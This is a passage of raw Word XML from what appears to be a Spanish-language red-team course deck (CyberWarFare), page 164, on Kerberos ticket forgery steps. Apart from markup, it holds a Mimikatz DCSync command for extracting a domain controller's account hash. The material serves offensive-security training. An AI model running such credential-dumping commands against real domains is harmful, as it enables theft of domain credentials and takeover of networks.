              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB536B9" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="720143A0" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="358C4B09" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62276020" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B9F8CE2" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52EC8B19" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57A1257B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C27D2FF" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7ED66F61" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="037BC7EA" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EB1103C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29C8986D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="204"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F8C6425" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:ind w:left="390"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57ED8609" wp14:editId="4E3BDE1C">
                <wp:extent cx="2931160" cy="307975"/>
                <wp:effectExtent l="9525" t="0" r="2539" b="6350"/>
                <wp:docPr id="568" name="Text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160" cy="307975"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="E7E6E6"/>
                        </a:solidFill>
                        <a:ln w="12700">
                          <a:solidFill>
                            <a:srgbClr val="4471C4"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="4F71EAEB" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="57"/>
                              <w:ind w:left="173"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                              <w:t>No hay comunicación con el DC en absoluto.</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="57ED8609" id="Textbox 568" o:spid="_x0000_s1290" type="#_x0000_t202" style="width:230.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" fillcolor="#e7e6e6" strokecolor="#4471c4" strokeweight="1pt">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="4F71EAEB" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="57"/>
                        <w:ind w:left="173"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                        <w:t>No hay comunicación con el DC en absoluto.</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:anchorlock/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EA8B0D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BE540A0" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="25"/>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8672" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="69C4C604" wp14:editId="3CED6C3B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>7917180</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>193077</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2903220" cy="460375"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="569" name="Text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460375"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="E7E6E6"/>
                        </a:solidFill>
                        <a:ln w="12700">
                          <a:solidFill>
                            <a:srgbClr val="4471C4"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="2D3E3C0F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="58" w:line="291" w:lineRule="exact"/>
                              <w:ind w:right="3"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>8. Otras solicitudes de validación opcionales con</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="4792DC39" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:line="291" w:lineRule="exact"/>
                              <w:ind w:left="3" w:right="3"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>se realiza el DC.</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="69C4C604" id="Textbox 569" o:spid="_x0000_s1291" type="#_x0000_t202" style="position:absolute;margin-left:623.4pt;margin-top:15.2pt;width:228.6pt;height:36.25pt;z-index:-1560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" fillcolor="#e7e6e6" strokecolor="#4471c4" strokeweight="1pt">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="2D3E3C0F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="58" w:line="291" w:lineRule="exact"/>
                        <w:ind w:right="3"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>8. Otras solicitudes de validación opcionales con</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="4792DC39" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:line="291" w:lineRule="exact"/>
                        <w:ind w:left="3" w:right="3"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>se realiza el DC.</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="44ECF7DE" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51EDCCE6" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2ADA77CF" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A331B64" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35AE80FA" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0296D2C3" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F203171" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="208"/>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09184" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7B5DF908" wp14:editId="5F27B3CC">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>4908803</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>308836</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2880360" cy="646430"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>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646430"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="E7E6E6"/>
                        </a:solidFill>
                        <a:ln w="12700">
                          <a:solidFill>
                            <a:srgbClr val="4471C4"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="60602934" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="65" w:line="235" w:lineRule="auto"/>
                              <w:ind w:left="405" w:firstLine="148"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>7. Los clientes que utilizan el TGS asignado están autenticados y autorizados para</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="64199D82" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:line="290" w:lineRule="exact"/>
                              <w:ind w:left="1444"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>acceder al servidor de base de datos</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="7B5DF908" id="Textbox 570" o:spid="_x0000_s1292" type="#_x0000_t202" style="position:absolute;margin-left:386.5pt;margin-top:24.3pt;width:226.8pt;height:50.9pt;z-index:-15607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" fillcolor="#e7e6e6" strokecolor="#4471c4" strokeweight="1pt">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="60602934" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="65" w:line="235" w:lineRule="auto"/>
                        <w:ind w:left="405" w:firstLine="148"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>7. Los clientes que utilizan el TGS asignado están autenticados y autorizados para</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="64199D82" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:line="290" w:lineRule="exact"/>
                        <w:ind w:left="1444"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>acceder al servidor de base de datos</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="4115BB82" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79C73394" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A12AE4C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69B58B6C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74B2AB10" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0559762F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="229"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="541795CE" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="17735"/>
        </w:tabs>
        <w:spacing w:before="1"/>
        <w:ind w:left="8042"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:color w:val="888888"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Curso del Equipo Rojo de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:color w:val="888888"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>CyberWarFare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:color w:val="888888"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:color w:val="888888"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>164</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DAEA89" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:footerReference w:type="default" r:id="rId289"/>
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="20" w:right="0" w:bottom="0" w:left="0" w:header="0" w:footer="0" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1464566D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1041"/>
        </w:tabs>
        <w:spacing w:before="57"/>
        <w:ind w:left="1041" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Extraiga el hash de la cuenta krbtgt :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6854401A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="032C219B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="14"/>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10208" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="112977BF" wp14:editId="7EE39DAB">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1696211</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>184499</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="8799830" cy="370840"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>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9830" cy="370840"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:ln w="9525">
                          <a:solidFill>
                            <a:srgbClr val="EC7C30"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="6AB2F2D5" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="86"/>
                              <w:ind w:left="136"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t>invoke-mimikatz -command '"lsadump::d csync /user:cyberwarfare\dc-01$"'</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="112977BF" id="Textbox 573" o:spid="_x0000_s1293" type="#_x0000_t202" style="position:absolute;margin-left:133.55pt;margin-top:14.55pt;width:692.9pt;height:29.2pt;z-index:-1560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" filled="f" strokecolor="#ec7c30">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="6AB2F2D5" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="86"/>
                        <w:ind w:left="136"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t>invoke-mimikatz -command '"lsadump::d csync /user:cyberwarfare\dc-01$"'</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
